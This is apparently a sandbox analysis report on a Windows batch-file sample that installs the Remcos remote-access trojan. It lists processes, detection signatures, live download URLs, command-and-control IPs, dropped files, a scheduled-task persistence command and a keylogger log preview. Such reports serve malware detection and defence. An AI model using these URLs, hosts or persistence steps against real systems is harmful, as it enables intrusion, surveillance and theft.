Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
Access Token Manipulation
Proc Filesystem11
Application Window Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
Process Injection
/etc/passwd and /etc/shadow1
System Owner/User Discovery
Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1584358 Sample: 9W9jJCj9EV.bat Startdate: 05/01/2025 Architecture: WINDOWS Score: 100 87 Antivirus detection for URL or domain 2->87 89 Multi AV Scanner detection for submitted file 2->89 91 Sigma detected: Remcos 2->91 93 9 other signatures 2->93 10 cmd.exe 3 2 2->10         started        13 wscript.exe 2->13         started        15 svchost.exe 1 1 2->15         started        18 wscript.exe 2->18         started        process3 dnsIp4 105 Suspicious powershell command line found 10->105 20 msword.exe 10->20         started        22 powershell.exe 14 16 10->22         started        27 powershell.exe 10->27         started        33 3 other processes 10->33 107 Windows Scripting host queries suspicious COM object (likely to drop second stage) 13->107 29 CineBlend.scr 13->29         started        85 127.0.0.1 unknown unknown 15->85 31 CineBlend.scr 18->31         started        signatures5 process6 dnsIp7 35 cmd.exe 20->35         started        81 193.26.115.39 QUICKPACKETUS Netherlands 22->81 69 C:\Users\user\Downloads\W2.pdf, PDF 22->69 dropped 99 Drops large PE files 22->99 101 Powershell drops PE file 22->101 71 C:\Users\user\AppData\Local\...\msword.exe, PE32 27->71 dropped 103 Loading BitLocker PowerShell Module 27->103 73 C:\Users\user\AppData\Local\Temp\msword.zip, Zip 33->73 dropped 39 AcroCEF.exe 107 33->39         started        file8 signatures9 process10 file11 65 C:\Users\user\AppData\Local\...\Prostores.com, PE32 35->65 dropped 95 Drops PE files with a suspicious file extension 35->95 97 Uses schtasks.exe or at.exe to add and modify task schedules 35->97 41 Prostores.com 35->41         started        46 conhost.exe 35->46         started        48 tasklist.exe 35->48         started        52 7 other processes 35->52 50 AcroCEF.exe 4 39->50         started        signatures12 process13 dnsIp14 83 178.237.33.50 ATOM86-ASATOM86NL Netherlands 41->83 75 C:\Users\user\AppData\Local\...\CineBlend.scr, PE32 41->75 dropped 77 C:\Users\user\AppData\Local\...\CineBlend.js, ASCII 41->77 dropped 79 C:\ProgramData\remcos\logs.dat, data 41->79 dropped 109 Detected Remcos RAT 41->109 111 Drops PE files with a suspicious file extension 41->111 113 Installs a global keyboard hook 41->113 54 cmd.exe 41->54         started        57 cmd.exe 41->57         started        file15 signatures16 process17 file18 67 C:\Users\user\AppData\...\CineBlend.url, MS 54->67 dropped 59 conhost.exe 54->59         started        61 conhost.exe 57->61         started        63 schtasks.exe 57->63         started        process19

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
9W9jJCj9EV.bat7%VirustotalBrowse
9W9jJCj9EV.bat13%ReversingLabs
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr0%ReversingLabs
C:\Users\user\AppData\Local\Temp\677826\Prostores.com0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://myguyapp.com/W2.pdf0%Avira URL Cloudsafe
https://myguyapp.com/W2.pdf60%Avira URL Cloudsafe
https://myguyapp.com/msword.zip100%Avira URL Cloudmalware
https://myguyapp.com/W2.pdfUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFI0%Avira URL Cloudsafe
https://myguyapp.com/msword.zipr0%Avira URL Cloudsafe
https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGP0%Avira URL Cloudsafe
https://myguyapp.com/W2.pdfd0%Avira URL Cloudsafe
https://myguyapp.com/msword.zipurl2=https://myguyapp.))0%Avira URL Cloudsafe
https://myguyapp.com/msword.zip~0%Avira URL Cloudsafe
https://myguyapp.com/W2.pdfUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=tin0%Avira URL Cloudsafe
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
https://myguyapp.com/msword.zipmsword.exe, 0000000F.00000002.1734013282.0000000002280000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000F.00000002.1732489885.000000000075E000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000F.00000002.1734104751.00000000023B0000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000012.00000003.1758622177.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000012.00000003.1757907965.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000012.00000002.1760983280.00000000031B0000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000012.00000002.1761710944.00000000034A0000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000014.00000002.1771269783.000000000320F000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000014.00000003.1770615869.000000000320E000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000014.00000003.1770485032.0000000003200000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000014.00000002.1771028960.00000000031E0000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000014.00000002.1771514838.0000000003370000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001A.00000002.1827537331.0000000002F20000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001A.00000002.1827456335.0000000002C98000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001B.00000002.1783919185.0000000002E30000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001B.00000002.1783752868.00000000009BB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.1785009950.0000000002E3B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.1786134258.0000000003250000.00000004.00000020.00020000.00000000.sdmp, 9W9jJCj9EV.battrue
  • Avira URL Cloud: malware
unknown
https://g.live.com/odclientsettings/Prod-C:svchost.exe, 00000007.00000003.1397678041.000001AA08683000.00000004.00000800.00020000.00000000.sdmpfalse
    high
    https://myguyapp.com/W2.pdfchoice.exe, 0000001A.00000002.1827456335.0000000002C98000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001B.00000002.1783919185.0000000002E30000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001B.00000002.1783752868.00000000009BB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.1785009950.0000000002E3B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.1786134258.0000000003250000.00000004.00000020.00020000.00000000.sdmp, 9W9jJCj9EV.battrue
    • Avira URL Cloud: safe
    unknown
    https://myguyapp.com/W2.pdf6tasklist.exe, 00000014.00000002.1771269783.000000000320F000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000014.00000003.1770615869.000000000320E000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000014.00000003.1770485032.0000000003200000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://myguyapp.com/msword.ziprtasklist.exe, 00000014.00000002.1771028960.00000000031E0000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://myguyapp.com/W2.pdfUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFIcmd.exe, 0000001E.00000002.1784753157.0000000000C40000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://g.live.com/odclientsettings/ProdV2-C:svchost.exe, 00000007.00000003.1397678041.000001AA08650000.00000004.00000800.00020000.00000000.sdmpfalse
      high
      https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPcmd.exe, 0000001E.00000002.1785009950.0000000002E30000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.1786134258.0000000003250000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.1784753157.0000000000C40000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://myguyapp.com/msword.zipurl2=https://myguyapp.))tasklist.exe, 00000014.00000002.1771514838.0000000003370000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://crl.ver)svchost.exe, 00000007.00000002.2574487359.000001AA08400000.00000004.00000020.00020000.00000000.sdmpfalse
        high
        http://www.autoitscript.com/autoit3/XProstores.com, 00000019.00000003.1782800462.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, Prostores.com, 00000019.00000000.1775153431.0000000000555000.00000002.00000001.01000000.00000009.sdmp, CineBlend.scr, 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmp, CineBlend.scr, 00000025.00000002.1934138128.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpfalse
          high
          http://nsis.sf.net/NSIS_ErrorErrormsword.exe, 0000000F.00000000.1716029840.0000000000409000.00000002.00000001.01000000.00000006.sdmp, msword.exe, 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmp, msword.exe.14.drfalse
            high
            https://myguyapp.com/W2.pdfUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=tinmsword.exe, 0000000F.00000002.1734104751.00000000023B0000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://www.autoitscript.com/autoit3/Prostores.com, 00000019.00000003.1782800462.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, Presidential.15.drfalse
              high
              https://myguyapp.com/W2.pdfdtasklist.exe, 00000014.00000002.1771028960.00000000031E0000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://myguyapp.com/msword.zip~choice.exe, 0000001A.00000002.1827456335.0000000002C98000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              178.237.33.50
              unknownNetherlands
              8455ATOM86-ASATOM86NLfalse
              193.26.115.39
              unknownNetherlands
              46261QUICKPACKETUSfalse
              IP
              127.0.0.1
              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1584358
              Start date and time:2025-01-05 08:55:10 +01:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 8m 23s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:39
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:9W9jJCj9EV.bat
              renamed because original name is a hash value
              Original Sample Name:e8dfdb915a523a09e139aaa900991ddd.bat
              Detection:MAL
              Classification:mal100.troj.spyw.expl.evad.winBAT@62/101@0/3
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 99%
              • Number of executed functions: 77
              • Number of non-executed functions: 310
              Cookbook Comments:
              • Found application associated with file extension: .bat
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
              • Excluded IPs from analysis (whitelisted): 184.28.88.176, 162.159.61.3, 172.64.41.3, 23.56.254.164, 23.209.209.135, 2.22.50.144, 2.22.50.131, 4.175.87.197, 20.242.39.171, 2.16.168.105, 2.16.168.107, 13.95.31.18, 23.200.0.21, 23.200.0.33, 192.168.2.9, 172.202.163.200, 13.107.246.45, 50.16.47.176, 23.47.168.24
              • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.afd.azureedge.net, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, glb.sls.prod.dcat.dsp.trafficmanager.net, www.bing.com, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, armmf.adobe.com, azureedge-t-prod.trafficmanager.net, geo2.adobe.com
              • Not all processes where analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size getting too big, too many NtCreateFile calls found.
              • Report size getting too big, too many NtCreateKey calls found.
              • Report size getting too big, too many NtOpenFile calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtSetInformationFile calls found.
              TimeTypeDescription
              02:56:05API Interceptor95x Sleep call for process: powershell.exe modified
              02:56:09API Interceptor2x Sleep call for process: svchost.exe modified
              02:56:17API Interceptor2x Sleep call for process: AcroCEF.exe modified
              02:56:43API Interceptor1x Sleep call for process: msword.exe modified
              02:57:56API Interceptor32x Sleep call for process: Prostores.com modified
              07:56:49Task SchedulerRun new task: Troubleshooting path: wscript s>//B "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js"
              07:56:53AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CineBlend.url
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              178.237.33.5017360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeGet hashmaliciousRemcosBrowse
              • geoplugin.net/json.gp
              Tax_Refund_Claim_2024_Australian_Taxation_Office.jsGet hashmaliciousRemcosBrowse
              • geoplugin.net/json.gp
              c2.htaGet hashmaliciousRemcosBrowse
              • geoplugin.net/json.gp
              4XYAW8PbZH.exeGet hashmaliciousRemcosBrowse
              • geoplugin.net/json.gp
              iGhDjzEiDU.exeGet hashmaliciousRemcosBrowse
              • geoplugin.net/json.gp
              1.exeGet hashmaliciousRemcosBrowse
              • geoplugin.net/json.gp
              Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeGet hashmaliciousRemcosBrowse
              • geoplugin.net/json.gp
              heteronymous.vbsGet hashmaliciousRemcos, GuLoaderBrowse
              • geoplugin.net/json.gp
              2LDJIyMl2r.exeGet hashmaliciousRemcosBrowse
              • geoplugin.net/json.gp
              1evAkYZpwDV0N4v.exeGet hashmaliciousRemcosBrowse
              • geoplugin.net/json.gp
              193.26.115.39c2.htaGet hashmaliciousRemcosBrowse
                c2.htaGet hashmaliciousRemcosBrowse
                  No context
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  ATOM86-ASATOM86NL17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  Tax_Refund_Claim_2024_Australian_Taxation_Office.jsGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  c2.htaGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  c2.htaGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  4XYAW8PbZH.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  iGhDjzEiDU.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  1.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  heteronymous.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                  • 178.237.33.50
                  2LDJIyMl2r.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  QUICKPACKETUSc2.htaGet hashmaliciousRemcosBrowse
                  • 193.26.115.39
                  c2.htaGet hashmaliciousRemcosBrowse
                  • 193.26.115.39
                  Dd5DwDCHJD.exeGet hashmaliciousQuasarBrowse
                  • 193.31.28.181
                  3e88PGFfkf.exeGet hashmaliciousDCRatBrowse
                  • 185.230.138.58
                  arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                  • 198.22.235.170
                  la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                  • 198.22.243.54
                  la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                  • 172.98.171.129
                  surfex.exeGet hashmaliciousRedLineBrowse
                  • 185.218.125.157
                  c2.htaGet hashmaliciousXWormBrowse
                  • 193.26.115.21
                  armv5l.elfGet hashmaliciousMiraiBrowse
                  • 23.133.3.186
                  No context
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrc2.htaGet hashmaliciousRemcosBrowse
                    c2.htaGet hashmaliciousRemcosBrowse
                      RisingStrip.exeGet hashmaliciousVidarBrowse
                        Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                          CenteredDealing.exeGet hashmaliciousVidarBrowse
                            CenteredDealing.exeGet hashmaliciousVidarBrowse
                              over.ps1Get hashmaliciousVidarBrowse
                                MatAugust.exeGet hashmaliciousVidarBrowse
                                  6684V5n83w.exeGet hashmaliciousVidarBrowse
                                    vlid_acid.exeGet hashmaliciousLummaC StealerBrowse
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):1310720
                                      Entropy (8bit):0.4932031419870138
                                      Encrypted:false
                                      SSDEEP:1536:cJNnm0h6QV70hV40h5RJkS6SNJNJbSMeCXhtvKTeYYJyNtEBRDna33JnbgY1ZtaW:cJhXC9lHmutpJyiRDeJ/aUKrDgnmE
                                      MD5:6CDBFCE53CF1966E924E7FB7D874F55F
                                      SHA1:D31F6B53B6F309E55B3B7E31937C65087DAC8DA5
                                      SHA-256:288F94118230010A9B83E8560C715358BC9E262AD2713F95A7EF8F9565DA6140
                                      SHA-512:E2586DCABD1D4B07510FC24748F9BF9DEFF5C718BBDF02E310A284BC9389264913BE014727A0D960F29C8D90689706C08272BEC5C164FA1F738A8C1D745332E6
                                      Malicious:false
                                      Preview:^.;V........@..@-....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................................&.#.\.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0x0869e2b2, page size 16384, DirtyShutdown, Windows version 10.0
                                      Category:dropped
                                      Size (bytes):1310720
                                      Entropy (8bit):0.7216816491232872
                                      Encrypted:false
                                      SSDEEP:1536:TSB2ESB2SSjlK/Tv5m0hnRJjAVtu8Ykr3g16tV2UPkLk+kcBLZiAcZwytuknSDVd:TazaNvFv8V2UW/DLzN/w4wZi
                                      MD5:748119E12EA8E86BA3A3F84B2A3E97BB
                                      SHA1:5AA7C3B281D61F1CEDC2B145C1342CCEF63D8C30
                                      SHA-256:EB96ABC7143C98CCCA42C0CAB79FCCB62DCF362F7C1D23A3312EA3FDB46D0137
                                      SHA-512:8FCA4A2B8A9AA737E1483CC7FDD2509EE3061C86EAA39196FA5C4E2FB06DB276301A8B26E3150F9D5D504B26D84E5817E5640F44B55096174FF21E3BB070490D
                                      Malicious:false
                                      Preview:.i.... ...............X\...;...{......................p.D..........{}..8...}..h.F.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......-....{...............................................................................................................................................................................................2...{..................................65..8...}.......................8...}...........................#......h.F.....................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):16384
                                      Entropy (8bit):0.08130118033330276
                                      Encrypted:false
                                      SSDEEP:3:xAyYeYlAssgvT/fgsCrZClW/tCULn6/Xoll+SHY/Xl+/rQLve:SyzwAsZLfgs3Ggsn6QAS4M
                                      MD5:D30DEFA58B2A84DF89AD530253A2E22B
                                      SHA1:FD91D5736F3D05528FBC2DB69658666EECF15C9B
                                      SHA-256:06540377C72A5D125DA4FC19B15802D412351BDE523F0247132A64910391A1B6
                                      SHA-512:73464E5DD9C440B2C8CC68DF38F990121A860CF1127DB946E0F901EF12687B4C33D5B4C7A94F77686F1C927FA3D56A6679CCBEF9259306A41D65F17D331C3E7E
                                      Malicious:false
                                      Preview:,h.......................................;...{...8...}.......{}..............{}......{}.vv_Q.....{}......................8...}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\677826\Prostores.com
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):144
                                      Entropy (8bit):3.3517416054053633
                                      Encrypted:false
                                      SSDEEP:3:rglsmHQlIXZU5JWRal2Jl+7R0DAlBG45klovDl6v:Mlsmwld5YcIeeDAlOWAv
                                      MD5:2D40E4F2C23F5F384B437383B6733A5D
                                      SHA1:00E786DF6DF67B0D32D135BC3E5726FA0FD3ED28
                                      SHA-256:30543988E2A91B9D4D38B43995B8A0B4C3CDAAB8FF8A2D9521BF24794BEB9A56
                                      SHA-512:746F6F10A131B306E6C3AD582FC2A4CF7A030A3656759D6600C0316ADB1309E40A3F151388821B42FC03597E713E6A48684BD8BCE394D7CB4F83DA8122B29834
                                      Malicious:true
                                      Preview:....[.2.0.2.5./.0.1./.0.5. .0.2.:.5.7.:.2.4. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                      File Type:ASCII text
                                      Category:dropped
                                      Size (bytes):290
                                      Entropy (8bit):5.156037321572476
                                      Encrypted:false
                                      SSDEEP:6:iOHjJcM+q2PqLTwi2nKuAl9OmbnIFUttjHJZmwDjHcMVkwOqLTwi2nKuAl9Ombjd:7SM+v8wZHAahFUtf/EMV5TwZHAaSJ
                                      MD5:DE7C1888AB727AC638011B6DEBB7B06E
                                      SHA1:3177569616E3A166CABCFFB4606F8E79CA510138
                                      SHA-256:8D1C45BF4BB5AA4C66538F6B0CED11988C72A10B0EF65C69551663A026230066
                                      SHA-512:887E8EA9CD5FA7098B9ED5839B60329BE05A0A6214D0F269AEFCA745511015A8D8DB457773F9C97965466BE2EE3ACDB8B0349F03272B0F1AF3BA7E59D6D3D1F4
                                      Malicious:false
                                      Preview:2025/01/05-02:56:09.850 1c6c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/05-02:56:09.856 1c6c Recovering log #3.2025/01/05-02:56:09.856 1c6c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                      File Type:ASCII text
                                      Category:dropped
                                      Size (bytes):290
                                      Entropy (8bit):5.156037321572476
                                      Encrypted:false
                                      SSDEEP:6:iOHjJcM+q2PqLTwi2nKuAl9OmbnIFUttjHJZmwDjHcMVkwOqLTwi2nKuAl9Ombjd:7SM+v8wZHAahFUtf/EMV5TwZHAaSJ
                                      MD5:DE7C1888AB727AC638011B6DEBB7B06E
                                      SHA1:3177569616E3A166CABCFFB4606F8E79CA510138
                                      SHA-256:8D1C45BF4BB5AA4C66538F6B0CED11988C72A10B0EF65C69551663A026230066
                                      SHA-512:887E8EA9CD5FA7098B9ED5839B60329BE05A0A6214D0F269AEFCA745511015A8D8DB457773F9C97965466BE2EE3ACDB8B0349F03272B0F1AF3BA7E59D6D3D1F4
                                      Malicious:false
                                      Preview:2025/01/05-02:56:09.850 1c6c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/05-02:56:09.856 1c6c Recovering log #3.2025/01/05-02:56:09.856 1c6c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                      File Type:ASCII text
                                      Category:dropped
                                      Size (bytes):334
                                      Entropy (8bit):5.15901920570984
                                      Encrypted:false
                                      SSDEEP:6:iOHj4i4q2PqLTwi2nKuAl9Ombzo2jMGIFUttj6u9JZmwDj6u9DkwOqLTwi2nKuAv:7sBv8wZHAa8uFUt1H/TV5TwZHAa8RJ
                                      MD5:7385453860BFE0624B1012A3C792C6A3
                                      SHA1:1F7493C3742A6476CC42AE0EC36E00D432AC7317
                                      SHA-256:0BEB7A97B33BAED8462C9BAEAECD04D360EEDE8FC1C1275A7F68E3A83CD51659
                                      SHA-512:D226DD0FCC06043FF6F90A9DFC8E9D4CE9DB82360A5B70CD28DFCE63D7EFB454BF9E11C9D95E93FD2794032570F9168404FE7C29493E41591288F73A3387CC41
                                      Malicious:false
                                      Preview:2025/01/05-02:56:09.881 1b80 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/05-02:56:09.883 1b80 Recovering log #3.2025/01/05-02:56:09.883 1b80 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                      File Type:ASCII text
                                      Category:dropped
                                      Size (bytes):334
                                      Entropy (8bit):5.15901920570984
                                      Encrypted:false
                                      SSDEEP:6:iOHj4i4q2PqLTwi2nKuAl9Ombzo2jMGIFUttj6u9JZmwDj6u9DkwOqLTwi2nKuAv:7sBv8wZHAa8uFUt1H/TV5TwZHAa8RJ
                                      MD5:7385453860BFE0624B1012A3C792C6A3
                                      SHA1:1F7493C3742A6476CC42AE0EC36E00D432AC7317
                                      SHA-256:0BEB7A97B33BAED8462C9BAEAECD04D360EEDE8FC1C1275A7F68E3A83CD51659
                                      SHA-512:D226DD0FCC06043FF6F90A9DFC8E9D4CE9DB82360A5B70CD28DFCE63D7EFB454BF9E11C9D95E93FD2794032570F9168404FE7C29493E41591288F73A3387CC41
                                      Malicious:false
                                      Preview:2025/01/05-02:56:09.881 1b80 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/05-02:56:09.883 1b80 Recovering log #3.2025/01/05-02:56:09.883 1b80 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                      File Type:JSON data
                                      Category:modified
                                      Size (bytes):475
                                      Entropy (8bit):4.975824910517686
                                      Encrypted:false
                                      SSDEEP:12:YH/um3RA8sqqDsBdOg2HYqAAcaq3QYiub5P7E4T3y:Y2sRdsjEdMHYqAr3QYhbt7nby
                                      MD5:52C36B6C95AE766D19A6FFF6F80D8824
                                      SHA1:E0F6688F6A4CA0F7496886DC4663F112C0269FD5
                                      SHA-256:264242502072929B8B7E238E2405176568FA6F03EFA5A1D8E1CA31D824179689
                                      SHA-512:633093C884C3446CF188CA46BD6600CBC8C28E34A1FEA2013472BF89F8EE3CF5934AE3B3AF64446FB0B539FB7F1F43D9F7D10F98C94DF4DA85FB35F79A27121F
                                      Malicious:false
